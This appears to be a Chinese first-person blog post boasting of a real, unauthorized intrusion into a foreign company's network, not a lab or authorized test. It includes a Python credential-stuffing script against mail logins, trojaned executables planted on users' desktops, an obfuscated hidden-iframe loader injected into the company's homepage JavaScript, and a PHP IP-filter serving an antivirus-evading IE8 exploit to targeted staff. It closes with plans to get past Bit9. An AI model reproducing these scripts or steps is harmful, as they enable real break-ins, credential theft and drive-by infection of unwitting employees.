文章均由自己原创,只是一直没有在自己博客发表。本地附件也没有了,我是从网上找来我的以前的投稿。
写在之前的废话:小菜技术能力不行,如果你觉得此文实在看不下去,还请PASS掉。如果你对我的文章有兴趣,可以与我一起交流。文章因为敏感无图,业内人士看看自然懂。
由于XXX耗时长,需要的支持多,而且目标敏感。在这里,我们不便介绍目标背景,也不多说其他的,直接来进入主题。
某国某目标,我盯了它大概半年。嗯,终于有一天,我觉得时机成熟,下手吧。
在渗透目标的前期,我们需要了解对方公司的安全意识。以及需要搜集所有网站的IP,公司的出口,以及公司网段所存在的B-C段,公司人员邮箱,公司人员爱好,facebook等信息。
首先,我把目标公司的WEB都给搜集好了,大公司一般C段都是在一起的。而我有个习惯,在渗透目标的时候,先喜欢把OWA的段找出来扫一下。这样大概的就知道了公司的架构情况。而很多时候,大公司都是会把WEB段给区分的,哪几个外网IP段是管理WEB的,哪几个段是放数据库的。不过随着网络越趋复杂,就算拿到了WEB 也就是在DMZ徘徊。不过只要拿到了WEB就好说了。Go把。
千辛万苦拿下来了这个公司的一个WEB,WEB如何拿下来咱们不多说。不是重点。当我分析内网情况的时候,环境就是在DMZ,system权限。通过判断协议,TCP HTTP都没问题。于是,我把DMZ WEB给中了一个马,这样更容易操作,至少得到了一个交互式的shell。先把远控抛开不说,通过netstat -ano分析。WEB服务器连上了在内部的一台数据库服务器。于是我找到了WEB服务器的web.config脚本,成功得到了数据库账户密码,但是数据库账户权限非SA,而且SQL SERVER版本是2008(悲剧,MSSQL 2000的话直接就远程溢出了).没办法,就算我们导了个shell,又有何用?不着急,慢慢分析,于是我试着去ping内网数据库机器,PING不通,接着我在拿S扫描器开了很小的线程,扫了扫WEB连接的数据库那台机器。和我猜想的结果是一样,这种情况我不是第一次碰到了。就只有个1433能够过去。这时,我猜想大概的内网架构是这样的:
WEB–>防火墙–>数据库服务器–>内网(而当我搞下来,发现情况并不是这样的)
算了,没办法。先不管了,连上数据库,分析数据,看能否去撞号,登OWA或者邮箱之类的。
于是写了个PYTHON脚本,去跑他们的OWA(这个脚本是N年前写的,可能不太符合,大家去改改就好了。原理差不多):
import smtplib ,sys ,timedef main():server = "smtp.live.com" #gmail smtp.gmail.com, yahoo smtp.mail.yahoo.comfp = open("D:\python\\hotmail.txt")fp1 = open("d:\python\\save.txt", 'a+')while 1:line = fp.readline()uandp = line.split(' ')name = uandp[0]name = name.split('@')[0]pwd = uandp[1]pwd = pwd.split("\n")[0]try:smtp = smtplib.SMTP_SSL(server,465) # gmail 465except:print "[*]Connect Error."sys.exit(0)passtry:#smtp.set_debuglevel(1)#smtp.ehlo()#smtp.starttls()smtp.ehlo()smtp.login(name,pwd)except:print "[-]:%s:%s" % (name, pwd)pass#time.sleep(1)else:out = "[+]:%s:%s\n" % (name, pwd)print outfp1.write(out)fp1.flush()smtp.quit()smtp.close()fp.close()fp1.close()if __name__=="__main__":main()
分析完数据,把数据库中的目标人物邮箱都给挑选出来。跑完。手工测试VPN,都失败了。没办法,继续另寻其他的路子。
来回到远控,通过分析,本机WEB有一个员工登录的地方,但是是.NET的。不能改代码。因为如果改写代码,需要重新编译(这里可能我说的有错。)但是有一个员工登录的地方我们就已经足够了,这里也先不管它。先分析再说。
我的远控是可以切换用户的,只要有用户在,可以切换到对方的用户下。首先分析了本地管理组的用户,抓密码。Query user 发现有几个用户在线。于是我切换到每个用户,主要就是查看IPC 。功夫不负有心人,当我切换到B的会话下的时候,NET USE看了看。大家猜我看到了啥?(可能你会想,咱们不是在DMZ吗?会话咋来的? 管理员从内网连过来。)
C:\ProgramData>net useNew connections will be remembered.Status Local Remote Network-------------------------------------------------------------------------------\\TSCLIENT\C Microsoft Terminal Services\\TSCLIENT\D Microsoft Terminal Services\\TSCLIENT\E Microsoft Terminal Services\\TSCLIENT\F Microsoft Terminal ServicesThe command completed successfully.
没错,管理员从内网连接过来,把盘给带过来了。这下有得玩了。于是我分析了连接过来的那个盘。通过netstat -ano 知道了带过盘来的那机器的IP。赶紧分析,知道了对方是管理员,在OWA的MAILBOX服务器上链接过来的。搞的多的就知道,MAILBOX是没WEB的,当然也有。MAILBOX主要的作用就是来存储MAIL的邮件数据。于是我CURL,S扫描了服务器的那个段。一样的,我DMZ怎么都过不去,而且对方常用端口也没开。如果开了,咱们直接复制个shell就过去,本地借用内网那台服务器执行命令就可以了。但是环境不允许我们这么容易就进入别人内网,扭转了几天,还是没办法,当我最后分析到另外一个盘符的时候,我竟然看到了IT服务器的一个盘,里面有IT部门的一部分密码。赶紧下载分析。这样,基本上我判断,域管可能在里面。于是我来到VPN,一个一个测试,竟然都失败了。心想:FUCK,肯定这个是一个小域,没有VPN可以有权限登录。然后在一个一个来测试OWA,竟然登录进去了一个。分析所有邮件,搜索关键字:PASSWORD FTP RDP SERVER,HACKER。等字眼。没有所获,就看到一封说近期有人在搞他们公司,需要加强安全防范的邮件(当然不是我。)。可能这时候很多人想:发邮件,绑马? 如果说你有0DAY或者免杀好的NDAY可以这样做。不然就是找死了。
这个时候,我还是信心满满的,不是有IT部门的盘吗? 嘿嘿,下载了几个常用的工具,比如VPN,补丁。绑马了,在传上去。还给CMD绑了个马,放到了MAILBOX的c:\users\**\desktop
把每个用户桌面上都放了一个CMD.EXE。就不相信管理员不运行。
等啊等啊,等了差不多半个月。没任何反映,决定还是自己出手。不然就被动,连WEB掉了都不好了。
从网上找代码,自己改写了一个PHP,在WEB服务器上挂了一个探针。这里有个小知识:WEB服务器不是http协议的,而是https来进行访问的,所以我们需要找一个https的网站(绿标的那种),不然你是探针不到任何信息的。说做就做,HTTPS绿标的网站我多的是,而PHP代码简单,改写代码如下:
function getBrowse() { global $_SERVER; $Agent = $_SERVER['HTTP_USER_AGENT']; $browser = ''; $browserver = ''; $Browser = array('Lynx', 'MOSAIC', 'AOL', 'Opera', 'JAVA', 'MacWeb', 'WebExplorer', 'OmniWeb'); for($i = 0; $i <= 7; $i ++){ if(strpos($Agent, $Browsers[$i])){ $browser = $Browsers[$i]; $browserver = ''; } } if(ereg('Mozilla', $Agent) && ereg('Maxthon', $Agent)){ $temp = explode('Maxthon/', $Agent); $Part = $temp[1]; $temp = explode(' ', $Part); $browserver = $temp[0]; $browser = 'Maxthon'; } if(ereg('Mozilla', $Agent) && ereg('Chrome', $Agent) && !ereg('Maxthon', $Agent)){ $temp = explode('Chrome/', $Agent); $Part = $temp[1]; $temp = explode(' ', $Part); $browserver = $temp[0]; $browser = 'Chrome'; } if(ereg('Mozilla', $Agent) && ereg('Opera', $Agent)) { $temp = explode('(', $Agent); $Part = $temp[1]; $temp = explode(')', $Part); $browserver = $temp[1]; $temp = explode(' ', $browserver); $browserver = $temp[2]; $browserver = preg_replace('/([d.]+)/', '\1', $browserver); $browserver = $browserver; $browser = 'Opera'; } if(ereg('Mozilla', $Agent) && ereg('MSIE', $Agent)){ $temp = explode('(', $Agent); $Part = $temp[1]; $temp = explode(';', $Part); $Part = $temp[1]; $temp = explode(' ', $Part); $browserver = $temp[2]; $browserver = preg_replace('/([d.]+)/','\1',$browserver); $browserver = $browserver; $browser = 'Internet Explorer'; } if($browser != ''){ $browseinfo = $browser.' '.$browserver; } else { $browseinfo = 'Unknow Browser'; } return $browseinfo; } function getIP() {return isset($_SERVER["HTTP_X_FORWARDED_FOR"])?$_SERVER["HTTP_X_FORWARDED_FOR"]:(isset($_SERVER["HTTP_CLIENT_IP"])?$_SERVER["HTTP_CLIENT_IP"]:$_SERVER["REMOTE_ADDR"]);}function getOS () { global $_SERVER; $agent = $_SERVER['HTTP_USER_AGENT']; $os = false; if (eregi('win', $agent) && strpos($agent, '95')){ $os = 'Windows 95'; } else if (eregi('win 9x', $agent) && strpos($agent, '4.90')){ $os = 'Windows ME'; } else if (eregi('win', $agent) && ereg('98', $agent)){ $os = 'Windows 98'; } else if (eregi('win', $agent) && eregi('nt 6.1', $agent)){ $os = 'Windows 7'; }else if (eregi('win', $agent) && eregi('nt 6', $agent)){ $os = 'Windows Vista'; } else if (eregi('win', $agent) && eregi('nt 5.1', $agent)){ $os = 'Windows XP'; } else if (eregi('win', $agent) && eregi('nt 5', $agent)){ $os = 'Windows 2000'; } else if (eregi('win', $agent) && eregi('nt', $agent)){ $os = 'Windows NT'; } else if (eregi('win', $agent) && ereg('32', $agent)){ $os = 'Windows 32'; } else if (eregi('linux', $agent)){ $os = 'Linux'; } else if (eregi('unix', $agent)){ $os = 'Unix'; } else if (eregi('sun', $agent) && eregi('os', $agent)){ $os = 'SunOS'; } else if (eregi('ibm', $agent) && eregi('os', $agent)){ $os = 'IBM OS/2'; } else if (eregi('Mac', $agent) && eregi('PC', $agent)){ $os = 'Macintosh'; } else if (eregi('PowerPC', $agent)){ $os = 'PowerPC'; } else if (eregi('AIX', $agent)){ $os = 'AIX'; } else if (eregi('HPUX', $agent)){ $os = 'HPUX'; } else if (eregi('NetBSD', $agent)){ $os = 'NetBSD'; } else if (eregi('BSD', $agent)){ $os = 'BSD'; } else if (ereg('OSF1', $agent)){ $os = 'OSF1'; } else if (ereg('IRIX', $agent)){ $os = 'IRIX'; } else if (eregi('FreeBSD', $agent)){ $os = 'FreeBSD'; } else if (eregi('teleport', $agent)){ $os = 'teleport'; } else if (eregi('flashget', $agent)){ $os = 'flashget'; } else if (eregi('webzip', $agent)){ $os = 'webzip'; } else if (eregi('offline', $agent)){ $os = 'offline'; } else { $os = 'Unknown'; } return $os; } 这里贴的PHP代码并非完整的,大家可以自己去改写。
脚本的功能是获取来源IP,OS,浏览器版本等等。当然如果你觉得还少,你可以加入探针JAVA,FLASH的一些功能。这里不在多说。
于是来到WEB主站,查看主页调用的JS。在JS里插入一段混淆代码。
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('5.6("<1 4=\\"2://3//9.a\\" 7=0 8=0></1>");',11,11,'|iframe|https|xxx|src|document|write|height|width|Ie|php'.split('|'),0,{})) 而原型如下:
document.write("<iframe src=\"https://xxx//Ie.php\" height=0 width=0></iframe>"); 接下来我们要做的就是分析来源IP,等待了几天以后。我查看了探针的地址。记录了不少IP.但是那么多IP应该如何来确定哪个是他们的出口IP呢?
没办法,偷懒把,写了个PYTHON脚本:
#!/usr/bin/env python#-*- coding:utf-8 -*-import sysimport threadingimport httplibimport reimport timeclass Myclass(threading.Thread):def __init__(self,host,path):threading.Thread.__init__(self)self.host = hostself.path = pathself.result = []def run(self):if "https://" in self.host:conn = httplib.HTTPSConnection(self.host,80,None,None,False,10)else:conn = httplib.HTTPConnection(self.host,80,False,10)i_headers = {"User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-Us; rv:1.9.1) Gecko/20090624 Firefox/3.5","Accept": "text/plain"}conn.request('GET',self.path,headers = i_headers)r1 = conn.getresponse()text = r1.read()text1 = text.lstrip()#size = text.count("\n")test = open('ip.txt','a+')test.write(text1)b = open("ip.txt",'r')c = open("ids.txt",'w')for line in b.readlines():m = re.search(r'(IP:\d*.\w*.\d*.\d*.\d*)',line) mm = m.group(0)owa = mm.replace("IP:","").strip().replace("\n","")self.result = owa.replace("\n","")c.write(self.result)c.write("\n")#print "write success"g = open("ids.txt",'r')for lines in g.readlines():getsip = lines.replace("\n","")try:conns = httplib.HTTPConnection("bgp.he.net",80,False,10)except Exception:print "[-]:connection out time"breakelse:conns.request('GET','/ip/%s' % getsip,headers = i_headers)r2 = conns.getresponse()texts = r2.read()try:line_split = re.search(r'(<u>.*\d+\D+.*.title=)',texts)obj = line_split.group(0)print "server:",obj.replace("<u>","").replace("</u>","").replace("\n","").replace("(<a href=\"","search domain:").replace("\" title=","").replace("/dns/","")except Exception, e:passtime.sleep(5)#print line_splitdef main():if len(sys.argv) < 3:print "[*]:Usage python info.py 127.0.0.1 /path"sys.exit(1)Mythread = Myclass(sys.argv[1],str(sys.argv[2]))Mythread.start()if __name__ == "__main__":main()
这个脚本的功能是先把目标网站记录的IP地址全部给读取下来,在本地保存为TXT,在循环依次读取一个IP,来到接口bgp.he.net 这个接口查询。至于如何分辨公司出口IP,不在多说了。看IP信息以及访问源就知道了。
成功获取到对方公司的出口IP,接下来就好办了。知道对方用的浏览器版本,OS,等等。
于是先决定先测试ie8的漏洞,网上找了个IE8的漏洞。本地WIN7 XP测试没问题(因为对方公司还是有人在用IE8,win7默认就是IE8)。但是网上找的IE8的漏洞都是被杀的不行的,于是心想,自己做把。
于是网上找了一个BASE64 JS解密脚本,把IE8的网马内写了几个函数,把核心代码都给放到函数里。然后直接把函数内都给BASE64加密了。OK,很简单把,不杀了。
但是我们在挂马的时候,并不是瞎挂。而是必须有针对性的挂,不然你挂上,杀毒软件一下把你样本给抓走了。改天又出这报告又出那报告的。多丢人。那就得需要一个定向挂马的脚本了。因为对方的HTTPS的,我VPS上没装HTTPS的证书,心想,直接就通过WEBSHELL把这串代码放到绿标的HTTPS网站上就好了。
定向挂马脚本如下:
function check_ip(){$ALLOWED_IP=array('192.168.2.*','目标公司出口IP');$IP=getIP();$check_ip_arr= explode('.',$IP);if(!in_array($IP,$ALLOWED_IP)) {foreach ($ALLOWED_IP as $val){if(strpos($val,'*')!==false){$arr=array();$arr=explode('.', $val);$bl=true;for($i=0;$i<4;$i++){if($arr[$i]!='*'){if($arr[$i]!=$check_ip_arr[$i]){$bl=false;break;}}}if($bl){return;die;}}}header('HTTP/1.1 403 Forbidden');exit();die;} else{} 脚本的else后头,就是调用的那个网马了。
我把这个脚本和IE网马都给放到了绿标的网站上,于是重新在目标网站上,把探针去了。加入咱们的PHP脚本地址,远程调用。接下来要做的事情就是等着把。
谁没成想:刚挂上没5分钟,目标公司人中了我的网马,上线了。擦噢,这人品,不是一般的好。
赶紧把代码给取了。做内网渗透去了。而当我们到达内网的时候,内网情况却是这样的
DMZ-> WAF-> mailbox(我来到了这台服务器上)-> IDS/IPS-> 另外的域-> 主域
妈的额,好麻烦。没办法啦。之前拿下来了IT的管理密码的清单,先把当前域搞下来再说。毫无悬念的,直接连上了当前的域,控制了OWA SERVER。擦屁股走人,远控上操作去了。
虽然拿下来了这个域,但是这个域内就那么几十台个人机,而目标公司是几万人,看样子这个是他们的一个分的部门。只有继续深入了。
接下来我们要找的就是其余域的其他网段了,我ping了下目标公司的主站www.xxoo.com,嗯,内网IP地址是10.xx.xx.xx,嗯,虽然能够PING通,但是IPC这些都是不行的。接下来要做的就是打入其他域,搞定其他域,慢慢深入。
于是把目标个公司所有域名全部给搜集起来,在内网一个一个ping,把返回是内网的IP地址都给记录下来。
然后把朋友写的扫描器,指定线程,上去扫常用的WEB框架,数据库之类的东西。
预知后事如何,还请听下回分解。谢谢。
目前主域已经搞下来了,但是无奈没域管,好不容易抓到。但是被BIT9发现我了,把我又T出来了。还是得慢慢来,不着急,慢慢分析把。下回且听分析如何绕过防范不严的BIT9。
很多人看了文章可能会觉得我说的太笼统了,倒是。我不可能那么详细的说出来一些东西,但是如果你能够在这个文章里学习到新的思路,那就是我写这个文章的目的。
)
)
)
)
)